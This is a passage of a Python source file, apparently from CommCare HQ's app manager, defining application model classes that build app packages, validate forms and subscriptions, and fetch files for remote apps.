reverse('download_profile', args=[self.domain, self._id])
)
@absolute_url_property
def media_profile_url(self):
return "%s?latest=true" % (
reverse('download_media_profile', args=[self.domain, self._id])
)
@property
def profile_loc(self):
return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
return reverse('corehq.apps.app_manager.views.download_jar', args=[self.domain, self._id])
def get_jar_path(self):
spec = {
'nokia/s40': 'Nokia/S40',
'nokia/s60': 'Nokia/S60',
'generic': 'Generic/Default',
'winmo': 'Native/WinMo'
}[self.platform]
if self.platform in ('nokia/s40', 'nokia/s60'):
spec += {
('native',): '-native-input',
('roman',): '-generic',
('custom-keys',): '-custom-keys',
('qwerty',): '-qwerty'
}[(self.text_input,)]
return spec
def get_jadjar(self):
return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
def validate_fixtures(self):
if not domain_has_privilege(self.domain, privileges.LOOKUP_TABLES):
# remote apps don't support get_forms yet.
# for now they can circumvent the fixture limitation. sneaky bastards.
if hasattr(self, 'get_forms'):
for form in self.get_forms():
if form.has_fixtures:
raise PermissionDenied(_(
"Usage of lookup tables is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
def validate_intents(self):
if domain_has_privilege(self.domain, privileges.CUSTOM_INTENTS):
return
if hasattr(self, 'get_forms'):
for form in self.get_forms():
intents = form.wrapped_xform().odk_intents
if intents:
if not domain_has_privilege(self.domain, privileges.TEMPLATED_INTENTS):
raise PermissionDenied(_(
"Usage of integrations is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
else:
templates = next(app_callout_templates)
if len(set(intents) - set(t['id'] for t in templates)):
raise PermissionDenied(_(
"Usage of external integration is not supported by your "
"current subscription. Please upgrade your "
"subscription before using this feature."
))
def validate_jar_path(self):
build = self.get_build()
setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
value = self.text_input
setting_version = setting['since'].get(value)
if setting_version:
setting_version = tuple(map(int, setting_version.split('.')))
my_version = build.minor_release()
if my_version < setting_version:
i = setting['values'].index(value)
assert i != -1
name = _(setting['value_names'][i])
raise AppEditingError((
'%s Text Input is not supported '
'in CommCare versions before %s.%s. '
'(You are using %s.%s)'
) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
settings = {
'JavaRosa-Admin-Password': self.admin_password,
'Profile': self.profile_loc,
'MIDlet-Jar-URL': self.jar_url,
#'MIDlet-Name': self.name,
# e.g. 2011-Apr-11 20:45
'CommCare-Release': "true",
}
if self.build_version < '2.8':
settings['Build-Number'] = self.version
return settings
def create_build_files(self, save=False, build_profile_id=None):
built_on = datetime.datetime.utcnow()
all_files = self.create_all_files(build_profile_id)
if save:
self.built_on = built_on
self.built_with = BuildRecord(
version=self.build_spec.version,
build_number=self.version,
datetime=built_on,
)
for filepath in all_files:
self.lazy_put_attachment(all_files[filepath],
'files/%s' % filepath)
def create_jadjar_from_build_files(self, save=False):
self.validate_jar_path()
with CriticalSection(['create_jadjar_' + self._id]):
try:
return (
self.lazy_fetch_attachment('CommCare.jad'),
self.lazy_fetch_attachment('CommCare.jar'),
)
except (ResourceError, KeyError):
all_files = {
filename[len('files/'):]: self.lazy_fetch_attachment(filename)
for filename in self.blobs if filename.startswith('files/')
}
all_files = {
name: (contents if isinstance(contents, str) else contents.encode('utf-8'))
for name, contents in all_files.items()
}
release_date = self.built_with.datetime or datetime.datetime.utcnow()
jad_settings = {
'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
}
jad_settings.update(self.jad_settings)
jadjar = self.get_jadjar().pack(all_files, jad_settings)
if save:
self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
self.built_with.signed = jadjar.signed
return jadjar.jad, jadjar.jar
def validate_app(self):
errors = []
errors.extend(self.check_password_charset())
try:
self.validate_fixtures()
self.validate_intents()
self.create_all_files()
except CaseXPathValidationError as cve:
errors.append({
'type': 'invalid case xpath reference',
'module': cve.module,
'form': cve.form,
})
except UserCaseXPathValidationError as ucve:
errors.append({
'type': 'invalid user case xpath reference',
'module': ucve.module,
'form': ucve.form,
})
except (AppEditingError, XFormValidationError, XFormException,
PermissionDenied, SuiteValidationError) as e:
errors.append({'type': 'error', 'message': unicode(e)})
except Exception as e:
if settings.DEBUG:
raise
# this is much less useful/actionable without a URL
# so make sure to include the request
logging.error('Unexpected error building app', exc_info=True,
extra={'request': view_utils.get_request()})
errors.append({'type': 'error', 'message': 'unexpected error: %s' % e})
return errors
@absolute_url_property
def odk_profile_url(self):
return reverse('corehq.apps.app_manager.views.download_odk_profile', args=[self.domain, self._id])
@absolute_url_property
def odk_media_profile_url(self):
return reverse('corehq.apps.app_manager.views.download_odk_media_profile', args=[self.domain, self._id])
@property
def odk_profile_display_url(self):
return self.short_odk_url or self.odk_profile_url
@property
def odk_media_profile_display_url(self):
return self.short_odk_media_url or self.odk_media_profile_url
def get_odk_qr_code(self, with_media=False, build_profile_id=None):
"""Returns a QR code, as a PNG to install on CC-ODK"""
try:
return self.lazy_fetch_attachment("qrcode.png")
except ResourceNotFound:
from pygooglechart import QRChart
HEIGHT = WIDTH = 250
code = QRChart(HEIGHT, WIDTH)
url = self.odk_profile_url if not with_media else self.odk_media_profile_url
if build_profile_id is not None:
url += '?profile={profile_id}'.format(profile_id=build_profile_id)
code.add_data(url)
# "Level L" error correction with a 0 pixel margin
code.set_ec('L', 0)
f, fname = tempfile.mkstemp()
code.download(fname)
os.close(f)
with open(fname, "rb") as f:
png_data = f.read()
self.lazy_put_attachment(png_data, "qrcode.png",
content_type="image/png")
return png_data
def generate_shortened_url(self, url_type, build_profile_id=None):
try:
if settings.BITLY_LOGIN:
view_name = 'corehq.apps.app_manager.views.{}'.format(url_type)
if build_profile_id is not None:
long_url = "{}{}?profile={}".format(
self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
)
else:
long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
shortened_url = bitly.shorten(long_url)
else:
shortened_url = None
except Exception:
logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
else:
return shortened_url
def get_short_url(self, build_profile_id=None):
if not build_profile_id:
if not self.short_url:
self.short_url = self.generate_shortened_url('download_jad')
self.save()
return self.short_url
else:
return self.generate_shortened_url('download_jad', build_profile_id)
def get_short_odk_url(self, with_media=False, build_profile_id=None):
if not build_profile_id:
if with_media:
if not self.short_odk_media_url:
self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
self.save()
return self.short_odk_media_url
else:
if not self.short_odk_url:
self.short_odk_url = self.generate_shortened_url('download_odk_profile')
self.save()
return self.short_odk_url
else:
if with_media:
return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
else:
return self.generate_shortened_url('download_odk_profile', build_profile_id)
def fetch_jar(self):
return self.get_jadjar().fetch_jar()
def make_build(self, comment=None, user_id=None, previous_version=None):
copy = super(ApplicationBase, self).make_build()
if not copy._id:
# I expect this always to be the case
# but check explicitly so as not to change the _id if it exists
copy._id = copy.get_db().server.next_uuid()
force_new_forms = False
if previous_version and self.build_profiles != previous_version.build_profiles:
force_new_forms = True
copy.set_form_versions(previous_version, force_new_forms)
copy.set_media_versions(previous_version)
copy.create_build_files(save=True)
# since this hard to put in a test
# I'm putting this assert here if copy._id is ever None
# which makes tests error
assert copy._id
copy.build_comment = comment
copy.comment_from = user_id
if user_id:
user = CouchUser.get(user_id)
if not user.has_built_app:
user.has_built_app = True
user.save()
copy.is_released = False
if not copy.is_remote_app():
copy.update_mm_map()
return copy
def delete_app(self):
domain_has_apps.clear(self.domain)
self.doc_type += '-Deleted'
record = DeleteApplicationRecord(
domain=self.domain,
app_id=self.id,
datetime=datetime.datetime.utcnow()
)
record.save()
return record
def save(self, response_json=None, increment_version=None, **params):
if not self._rev and not domain_has_apps(self.domain):
domain_has_apps.clear(self.domain)
super(ApplicationBase, self).save(
response_json=response_json, increment_version=increment_version, **params)
def set_form_versions(self, previous_version, force_new_version=False):
# by default doing nothing here is fine.
pass
def set_media_versions(self, previous_version):
pass
def update_mm_map(self):
if self.build_profiles and domain_has_privilege(self.domain, privileges.BUILD_PROFILES):
for lang in self.langs:
self.media_language_map[lang] = MediaList()
for form in self.get_forms():
xml = form.wrapped_xform()
for lang in self.langs:
media = []
for path in xml.all_media_references(lang):
if path is not None:
media.append(path)
map_item = self.multimedia_map.get(path)
#dont break if multimedia is missing
if map_item:
map_item.form_media = True
self.media_language_map[lang].media_refs.extend(media)
else:
self.media_language_map = {}
def get_build_langs(self, build_profile_id=None):
if build_profile_id is not None:
return self.build_profiles[build_profile_id].langs
else:
return self.langs
def validate_lang(lang):
if not re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang):
raise ValueError("Invalid Language")
def validate_property(property):
"""
Validate a case property name
>>> validate_property('parent/maternal-grandmother_fullName')
>>> validate_property('foo+bar')
Traceback (most recent call last):
...
ValueError: Invalid Property
"""
# this regex is also copied in propertyList.ejs
if not re.match(r'^[a-zA-Z][\w_-]*(/[a-zA-Z][\w_-]*)*$', property):
raise ValueError("Invalid Property")
def validate_detail_screen_field(field):
# If you change here, also change here:
# corehq/apps/app_manager/static/app_manager/js/detail-screen-config.js
field_re = r'^([a-zA-Z][\w_-]*:)*([a-zA-Z][\w_-]*/)*#?[a-zA-Z][\w_-]*$'
if not re.match(field_re, field):
raise ValueError("Invalid Sort Field")
class SavedAppBuild(ApplicationBase):
def to_saved_build_json(self, timezone):
data = super(SavedAppBuild, self).to_json().copy()
for key in ('modules', 'user_registration', 'external_blobs',
'_attachments', 'profile', 'translations'
'description', 'short_description'):
data.pop(key, None)
built_on_user_time = ServerTime(self.built_on).user_time(timezone)
data.update({
'id': self.id,
'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
'menu_item_label': self.built_with.get_menu_item_label(),
'jar_path': self.get_jar_path(),
'short_name': self.short_name,
'enable_offline_install': self.enable_offline_install,
})
comment_from = data['comment_from']
if comment_from:
try:
comment_user = CouchUser.get(comment_from)
except ResourceNotFound:
data['comment_user_name'] = comment_from
else:
data['comment_user_name'] = comment_user.full_name
return data
class Application(ApplicationBase, TranslationMixin, HQMediaMixin):
"""
An Application that can be created entirely through the online interface
"""
modules = SchemaListProperty(ModuleBase)
name = StringProperty()
# profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
# ended up not using a schema because properties is a reserved word
profile = DictProperty()
use_custom_suite = BooleanProperty(default=False)
custom_base_url = StringProperty()
cloudcare_enabled = BooleanProperty(default=False)
translation_strategy = StringProperty(default='select-known',
choices=app_strings.CHOICES.keys())
commtrack_requisition_mode = StringProperty(choices=CT_REQUISITION_MODES)
auto_gps_capture = BooleanProperty(default=False)
created_from_template = StringProperty()
use_grid_menus = BooleanProperty(default=False)
@property
@memoized
def commtrack_enabled(self):
if settings.UNIT_TESTING:
return False # override with .tests.util.commtrack_enabled
domain_obj = Domain.get_by_name(self.domain) if self.domain else None
return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
for module in data.get('modules', []):
for attr in ('case_label', 'referral_label'):
if not module.has_key(attr):
module[attr] = {}
for lang in data['langs']:
if not module['case_label'].get(lang):
module['case_label'][lang] = commcare_translations.load_translations(lang).get('cchq.case', 'Cases')
if not module['referral_label'].get(lang):
module['referral_label'][lang] = commcare_translations.load_translations(lang).get('cchq.referral', 'Referrals')
data.pop('commtrack_enabled', None) # Remove me after migrating apps
self = super(Application, cls).wrap(data)
# make sure all form versions are None on working copies
if not self.copy_of:
for form in self.get_forms():
form.version = None
# weird edge case where multimedia_map gets set to null and causes issues
if self.multimedia_map is None:
self.multimedia_map = {}
return self
def save(self, *args, **kwargs):
super(Application, self).save(*args, **kwargs)
# Import loop if this is imported at the top
# TODO: revamp so signal_connections <- models <- signals
from corehq.apps.app_manager import signals
signals.app_post_save.send(Application, application=self)
def make_reversion_to_copy(self, copy):
app = super(Application, self).make_reversion_to_copy(copy)
for form in app.get_forms():
# reset the form's validation cache, since the form content is
# likely to have changed in the revert!
form.validation_cache = None
form.version = None
app.build_broken = False
return app
@property
def profile_url(self):
return self.hq_profile_url
@absolute_url_property
def suite_url(self):
return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
if self.enable_relative_suite_path:
return './suite.xml'
else:
return "jr://resource/suite.xml"
@absolute_url_property
def media_suite_url(self):
return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
if self.enable_relative_suite_path:
return "./media_suite.xml"
else:
return "jr://resource/media_suite.xml"
@property
def default_language(self):
return self.langs[0] if len(self.langs) > 0 else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
if not form:
form = self.get_module(module_id).get_form(form_id)
return form.validate_form().render_xform(build_profile_id).encode('utf-8')
def set_form_versions(self, previous_version, force_new_version=False):
"""
Set the 'version' property on each form as follows to the current app version if the form is new
or has changed since the last build. Otherwise set it to the version from the last build.
"""
def _hash(val):
return hashlib.md5(val).hexdigest()
if previous_version:
for form_stuff in self.get_forms(bare=False):
filename = 'files/%s' % self.get_form_filename(**form_stuff)
form = form_stuff["form"]
if not force_new_version:
form_version = None
try:
previous_form = previous_version.get_form(form.unique_id)
# take the previous version's compiled form as-is
# (generation code may have changed since last build)
previous_source = previous_version.fetch_attachment(filename)
except (ResourceNotFound, FormNotFoundException):
pass
else:
previous_hash = _hash(previous_source)
# hack - temporarily set my version to the previous version
# so that that's not treated as the diff
previous_form_version = previous_form.get_version()
form.version = previous_form_version
my_hash = _hash(self.fetch_xform(form=form))
if previous_hash == my_hash:
form_version = previous_form_version
if form_version is None:
form.version = None
else:
form.version = form_version
else:
form.version = None
def set_media_versions(self, previous_version):
"""
Set the media version numbers for all media in the app to the current app version
if the media is new or has changed since the last build. Otherwise set it to the
version from the last build.
"""
# access to .multimedia_map is slow
prev_multimedia_map = previous_version.multimedia_map if previous_version else {}
for path, map_item in self.multimedia_map.iteritems():
prev_map_item = prev_multimedia_map.get(path, None)
if prev_map_item and prev_map_item.unique_id:
# Re-use the id so CommCare knows it's the same resource
map_item.unique_id = prev_map_item.unique_id
if (prev_map_item and prev_map_item.version
and prev_map_item.multimedia_id == map_item.multimedia_id):
map_item.version = prev_map_item.version
else:
map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
"""
Creates unique_ids for modules that don't have unique_id attributes
should_save: the doc will be saved only if should_save is set to True
WARNING: If called on the same doc in different requests without saving,
this function will set different uuid each time,
likely causing unexpected behavior
"""
if any(not mod.unique_id for mod in self.modules):
for mod in self.modules:
mod.get_or_create_unique_id()
if should_save:
self.save()
def create_app_strings(self, lang, build_profile_id=None):
gen = app_strings.CHOICES[self.translation_strategy]
if lang == 'default':
return gen.create_default_app_strings(self, build_profile_id)
else:
return gen.create_app_strings(self, lang)
@property
def skip_validation(self):
properties = (self.profile or {}).get('properties', {})
return properties.get('cc-content-valid', 'yes')
@property
def jad_settings(self):
s = super(Application, self).jad_settings
s.update({
'Skip-Validation': self.skip_validation,
})
return s
def create_profile(self, is_odk=False, with_media=False,
template='app_manager/profile.xml', build_profile_id=None):
self__profile = self.profile
app_profile = defaultdict(dict)
for setting in commcare_settings.get_custom_commcare_settings():
setting_type = setting['type']
setting_id = setting['id']
if setting_type not in ('properties', 'features'):
setting_value = None
elif setting_id not in self__profile.get(setting_type, {}):
if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
setting_value = setting['default']
else:
setting_value = None
else:
setting_value = self__profile[setting_type][setting_id]
if setting_value:
app_profile[setting_type][setting_id] = {
'value': setting_value,
'force': setting.get('force', False)
}
# assert that it gets explicitly set once per loop
del setting_value
if self.case_sharing:
app_profile['properties']['server-tether'] = {
'force': True,
'value': 'sync',
}
logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
for logo_name in logo_refs:
app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
'value': self.logo_refs[logo_name]['path'],
}
if with_media:
profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
else:
profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')
if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
app_profile['custom_properties'].update(self__profile['custom_properties'])
locale = self.get_build_langs(build_profile_id)[0]
return render_to_string(template, {
'is_odk': is_odk,
'app': self,
'profile_url': profile_url,
'app_profile': app_profile,
'cc_user_domain': cc_user_domain(self.domain),
'include_media_suite': with_media,
'uniqueid': self.copy_of or self.id,
'name': self.name,
'descriptor': u"Profile File",
'build_profile_id': build_profile_id,
'locale': locale
}).encode('utf-8')
@property
def custom_suite(self):
try:
return self.lazy_fetch_attachment('custom_suite.xml')
except ResourceNotFound:
return ""
def set_custom_suite(self, value):
self.put_attachment(value, 'custom_suite.xml')
def create_suite(self, build_profile_id=None):
if self.application_version == APP_V1:
template='app_manager/suite-%s.xml' % self.application_version
langs = self.get_build_langs(build_profile_id)
return render_to_string(template, {
'app': self,
'langs': ["default"] + langs
})
else:
return SuiteGenerator(self, build_profile_id).generate_suite()
def create_media_suite(self, build_profile_id=None):
return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
return 'modules-%s/forms-%s.xml' % (module.id, form.id)
def create_all_files(self, build_profile_id=None):
prefix = '' if not build_profile_id else build_profile_id + '/'
files = {
'{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
'{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
'{}media_profile.xml'.format(prefix):
self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
'{}media_profile.ccpr'.format(prefix):
self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
'{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
'{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
}
langs_for_build = self.get_build_langs(build_profile_id)
for lang in ['default'] + langs_for_build:
files["{prefix}{lang}/app_strings.txt".format(
prefix=prefix, lang=lang)] = self.create_app_strings(lang, build_profile_id)
for form_stuff in self.get_forms(bare=False):
filename = prefix + self.get_form_filename(**form_stuff)
form = form_stuff['form']
try:
files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
except XFormException as e:
raise XFormException(_('Error in form "{}": {}').format(trans(form.name), unicode(e)))
return files
get_modules = IndexedSchema.Getter('modules')
@parse_int([1])
def get_module(self, i):
try:
return self.modules[i].with_id(i % len(self.modules), self)
except IndexError:
raise ModuleNotFoundException()
def get_module_by_unique_id(self, unique_id):
def matches(module):
return module.get_or_create_unique_id() == unique_id
for obj in self.get_modules():
if matches(obj):
return obj
raise ModuleNotFoundException(
("Module in app '%s' with unique id '%s' not found"
% (self.id, unique_id)))
def get_forms(self, bare=True):
for module in self.get_modules():
for form in module.get_forms():
yield form if bare else {
'type': 'module_form',
'module': module,
'form': form
}
def get_form(self, unique_form_id, bare=True):
def matches(form):
return form.get_unique_id() == unique_form_id
for obj in self.get_forms(bare):
if matches(obj if bare else obj['form']):
return obj
raise FormNotFoundException(
("Form in app '%s' with unique id '%s' not found"
% (self.id, unique_form_id)))
def get_form_location(self, unique_form_id):
for m_index, module in enumerate(self.get_modules()):
for f_index, form in enumerate(module.get_forms()):
if unique_form_id == form.unique_id:
return m_index, f_index
raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, unique_form_id))
@classmethod
def new_app(cls, domain, name, application_version, lang="en"):
app = cls(domain=domain, modules=[], name=name, langs=[lang], application_version=application_version)
return app
def add_module(self, module):
self.modules.append(module)
return self.get_module(-1)
def delete_module(self, module_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
except ModuleNotFoundException:
return None
record = DeleteModuleRecord(
domain=self.domain,
app_id=self.id,
module_id=module.id,
module=module,
datetime=datetime.datetime.utcnow()
)
del self.modules[module.id]
record.save()
return record
def new_form(self, module_id, name, lang, attachment=""):
module = self.get_module(module_id)
return module.new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
form = self.get_form(form_unique_id)
except (ModuleNotFoundException, FormNotFoundException):
return None
record = DeleteFormRecord(
domain=self.domain,
app_id=self.id,
module_unique_id=module_unique_id,
form_id=form.id,
form=form,
datetime=datetime.datetime.utcnow(),
)
record.save()
try:
form.pre_delete_hook()
except NotImplementedError:
pass
del module['forms'][form.id]
return record
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
if old_lang == new_lang:
return
if new_lang in self.langs:
raise AppEditingError("Language %s already exists!" % new_lang)
for i,lang in enumerate(self.langs):
if lang == old_lang:
self.langs[i] = new_lang
for profile in self.build_profiles:
for i, lang in enumerate(profile.langs):
if lang == old_lang:
profile.langs[i] = new_lang
for module in self.get_modules():
module.rename_lang(old_lang, new_lang)
_rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
modules = self.modules
try:
modules.insert(i, modules.pop(j))
except IndexError:
raise RearrangeError()
self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
"""
The case type of the two modules conflict,
ConflictingCaseTypeError is raised,
but the rearrangement (confusingly) goes through anyway.
This is intentional.
"""
to_module = self.get_module(to_module_id)
from_module = self.get_module(from_module_id)
try:
from_module.forms[j].pre_move_hook(from_module, to_module)
except NotImplementedError:
pass
try:
form = from_module.forms.pop(j)
to_module.add_insert_form(from_module, form, index=i, with_source=True)
except IndexError:
raise RearrangeError()
if to_module.case_type != from_module.case_type:
raise ConflictingCaseTypeError()
def scrub_source(self, source):
return update_unique_ids(source)
def copy_form(self, module_id, form_id, to_module_id):
"""
The case type of the two modules conflict,
ConflictingCaseTypeError is raised,
but the copying (confusingly) goes through anyway.
This is intentional.
"""
from_module = self.get_module(module_id)
form = from_module.get_form(form_id)
to_module = self.get_module(to_module_id)
self._copy_form(from_module, form, to_module, rename=True)
def _copy_form(self, from_module, form, to_module, *args, **kwargs):
if not form.source:
raise BlankXFormError()
copy_source = deepcopy(form.to_json())
if 'unique_id' in copy_source:
del copy_source['unique_id']
if 'rename' in kwargs and kwargs['rename']:
for lang, name in copy_source['name'].iteritems():
with override(lang):
copy_source['name'][lang] = _('Copy of {name}').format(name=name)
copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
save_xform(self, copy_form, form.source)
if from_module['case_type'] != to_module['case_type']:
raise ConflictingCaseTypeError()
@cached_property
def has_case_management(self):
for module in self.get_modules():
for form in module.get_forms():
if len(form.active_actions()) > 0:
return True
return False
@memoized
def case_type_exists(self, case_type):
return case_type in self.get_case_types()
@memoized
def get_case_types(self):
extra_types = set()
if is_usercase_in_use(self.domain):
extra_types.add(USERCASE_TYPE)
return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types
def has_media(self):
return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
xmlns_map = defaultdict(list)
for form in self.get_forms():
xmlns_map[form.xmlns].append(form)
return xmlns_map
def get_form_by_xmlns(self, xmlns, log_missing=True):
if xmlns == "http://code.javarosa.org/devicereport":
return None
forms = self.get_xmlns_map()[xmlns]
if len(forms) != 1:
if log_missing or len(forms) > 1:
logging.error('App %s in domain %s has %s forms with xmlns %s' % (
self.get_id,
self.domain,
len(forms),
xmlns,
))
return None
else:
form, = forms
return form
def get_questions(self, xmlns):
form = self.get_form_by_xmlns(xmlns)
if not form:
return []
return form.get_questions(self.langs)
def check_subscription(self):
def app_uses_usercase(app):
return any(m.uses_usercase() for m in app.get_modules())
errors = []
if app_uses_usercase(self) and not domain_has_privilege(self.domain, privileges.USER_CASE):
errors.append({
'type': 'subscription',
'message': _('Your application is using User Case functionality. You can remove User Case '
'functionality by opening the User Case Management tab in a form that uses it, and '
'clicking "Remove User Case Properties".')
})
return errors
def validate_app(self):
xmlns_count = defaultdict(int)
errors = []
for lang in self.langs:
if not lang:
errors.append({'type': 'empty lang'})
if not self.modules:
errors.append({'type': "no modules"})
for module in self.get_modules():
errors.extend(module.validate_for_build())
for form in self.get_forms():
errors.extend(form.validate_for_build(validate_module=False))
# make sure that there aren't duplicate xmlns's
xmlns_count[form.xmlns] += 1
for xmlns in xmlns_count:
if xmlns_count[xmlns] > 1:
errors.append({'type': "duplicate xmlns", "xmlns": xmlns})
if any(not module.unique_id for module in self.get_modules()):
raise ModuleIdMissingException
modules_dict = {m.unique_id: m for m in self.get_modules()}
def _parent_select_fn(module):
if hasattr(module, 'parent_select') and module.parent_select.active:
return module.parent_select.module_id
if self._has_dependency_cycle(modules_dict, _parent_select_fn):
errors.append({'type': 'parent cycle'})
errors.extend(self._child_module_errors(modules_dict))
errors.extend(self.check_subscription())
if not errors:
errors = super(Application, self).validate_app()
return errors
def _has_dependency_cycle(self, modules, neighbour_id_fn):
"""
Detect dependency cycles given modules and the neighbour_id_fn
:param modules: A mapping of module unique_ids to Module objects
:neighbour_id_fn: function to get the neibour module unique_id
:return: True if there is a cycle in the module relationship graph
"""
visited = set()
completed = set()
def cycle_helper(m):
if m.id in visited:
if m.id in completed:
return False
return True
visited.add(m.id)
parent = modules.get(neighbour_id_fn(m), None)
if parent is not None and cycle_helper(parent):
return True
completed.add(m.id)
return False
for module in modules.values():
if cycle_helper(module):
return True
return False
def _child_module_errors(self, modules_dict):
module_errors = []
def _root_module_fn(module):
if hasattr(module, 'root_module_id'):
return module.root_module_id
if self._has_dependency_cycle(modules_dict, _root_module_fn):
module_errors.append({'type': 'root cycle'})
module_ids = set([m.unique_id for m in self.get_modules()])
root_ids = set([_root_module_fn(m) for m in self.get_modules() if _root_module_fn(m) is not None])
if not root_ids.issubset(module_ids):
module_errors.append({'type': 'unknown root'})
return module_errors
def get_profile_setting(self, s_type, s_id):
setting = self.profile.get(s_type, {}).get(s_id)
if setting is not None:
return setting
yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
for contingent in yaml_setting.get("contingent_default", []):
if check_condition(self, contingent["condition"]):
setting = contingent["value"]
if setting is not None:
return setting
if self.build_version < yaml_setting.get("since", "0"):
setting = yaml_setting.get("disabled_default", None)
if setting is not None:
return setting
return yaml_setting.get("default")
@property
def has_careplan_module(self):
return any((module for module in self.modules if isinstance(module, CareplanModule)))
@quickcache(['self.version'])
def get_case_metadata(self):
from corehq.apps.reports.formdetails.readable import AppCaseMetadata
builder = ParentCasePropertyBuilder(self)
case_relationships = builder.get_parent_type_map(self.get_case_types())
meta = AppCaseMetadata()
for case_type, relationships in case_relationships.items():
type_meta = meta.get_type(case_type)
type_meta.relationships = relationships
for module in self.get_modules():
for form in module.get_forms():
form.update_app_case_meta(meta)
seen_types = []
def get_children(case_type):
seen_types.append(case_type)
return [type_.name for type_ in meta.case_types if type_.relationships.get('parent') == case_type]
def get_hierarchy(case_type):
return {child: get_hierarchy(child) for child in get_children(case_type)}
roots = [type_ for type_ in meta.case_types if not type_.relationships]
for type_ in roots:
meta.type_hierarchy[type_.name] = get_hierarchy(type_.name)
for type_ in meta.case_types:
if type_.name not in seen_types:
meta.type_hierarchy[type_.name] = {}
type_.error = _("Error in case type hierarchy")
return meta
def get_subcase_types(self, case_type):
"""
Return the subcase types defined across an app for the given case type
"""
return {t for m in self.get_modules()
if m.case_type == case_type
for t in m.get_subcase_types()}
class RemoteApp(ApplicationBase):
"""
A wrapper for a url pointing to a suite or profile file. This allows you to
write all the files for an app by hand, and then give the url to app_manager
and let it package everything together for you.
"""
profile_url = StringProperty(default="http://")
name = StringProperty()
manage_urls = BooleanProperty(default=False)
questions_map = DictProperty(required=False)
def is_remote_app(self):
return True
@classmethod
def new_app(cls, domain, name, lang='en'):
app = cls(domain=domain, name=name, langs=[lang])
return app
def create_profile(self, is_odk=False, langs=None):
# we don't do odk for now anyway
return remote_app.make_remote_profile(self, langs)
def strip_location(self, location):
return remote_app.strip_location(self.profile_url, location)
def fetch_file(self, location):
location = self.strip_location(location)
url = urljoin(self.profile_url, location)
try:
content = urlopen(url).read()
except Exception:
raise AppEditingError('Unable to access resource url: "%s"' % url)
return location, content
def get_build_langs(self):
if self.build_profiles:
if len(self.build_profiles.keys()) > 1:
raise AppEditingError('More than one app profile for a remote app')
else:
# return first profile, generated as part of lazy migration
return self.build_profiles[self.build_profiles.keys()[0]].langs
else:
return self.langs
@classmethod
def get_locations(cls, suite):
for resource in suite.findall('*/resource'):
try:
loc = resource.findtext('location[@authority="local"]')
except Exception:
loc = resource.findtext('location[@authority="remote"]')
yield resource.getparent().tag, loc
@property
def SUITE_XPATH(self):
return 'suite/resource/location[@authority="local"]'
def create_all_files(self, build_profile_id=None):
langs_for_build = self.get_build_langs()
files = {
'profile.xml': self.create_profile(langs=langs_for_build),
}
tree = _parse_xml(files['profile.xml'])
def add_file_from_path(path, strict=False, transform=None):
added_files = []
# must find at least one
try:
tree.find(path).text
except (TypeError, AttributeError):
if strict:
raise AppEditingError("problem with file path reference!")
else:
return
for loc_node in tree.findall(path):
loc, file = self.fetch_file(loc_node.text)
if transform:
file = transform(file)
files[loc] = file
added_files.append(file)
return added_files
add_file_from_path('features/users/logo')
try:
suites = add_file_from_path(
self.SUITE_XPATH,
strict=True,
transform=(lambda suite:
remote_app.make_remote_suite(self, suite))
)
except AppEditingError:
raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
for suite in suites:
suite_xml = _parse_xml(suite)
for tag, location in self.get_locations(suite_xml):
location, data = self.fetch_file(location)
if tag == 'xform' and langs_for_build:
try:
